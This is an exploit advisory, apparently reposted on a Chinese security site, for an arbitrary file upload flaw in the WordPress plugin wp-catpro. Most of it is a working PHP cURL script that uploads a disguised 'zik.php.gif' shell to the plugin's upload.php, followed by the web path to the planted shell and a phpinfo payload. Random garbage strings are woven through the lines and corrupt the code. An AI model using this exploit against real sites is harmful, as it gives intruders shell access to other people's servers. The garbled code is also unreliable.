WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
+ X0 W8 `* |! d6 g$ Z* _% b下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
6 ~" X! q) `7 v####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
" ?+ }% P) l! c8 Z/ i9 h1 h4 ~9 J" U# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
% f2 _6 Z- o/ q------------------
1 }: {. t* @# e" v- c: w( v
4 w. T0 w2 L2 ~+ X1 S! ^6 M& `#=> Exploit
-----------
5 H  _! \" n3 O8 |- i7 b<?php
9 Z; H5 b: ~2 A
2 R. A( V' a& U" n8 m, x& ?* J/ \$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
1 d* B* ^5 z5 {' q4 Y4 g3 Zcurl_setopt($ch, CURLOPT_POSTFIELDS,
' K+ j( k! e8 `5 @array('Filedata'=>"@$uploadfile",
9 d2 u/ C$ K- d5 ?3 I'folder'=>'/wp-content/uploads/catpro/'));
- ?2 t: k" G2 L% \curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
$ R  v& X% B1 I4 z  Mcurl_close($ch);

print "$postResult";
8 {$ G4 _( r' q, e
1 h8 c3 Q" n" s, e8 Y: DShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
% Q0 P9 v% H, T$ n, y  ?>
<?php
8 o5 Q4 S/ Y; P2 N. `  {  q, wphpinfo();
  X/ t' T$ a6 m1 I6 r?>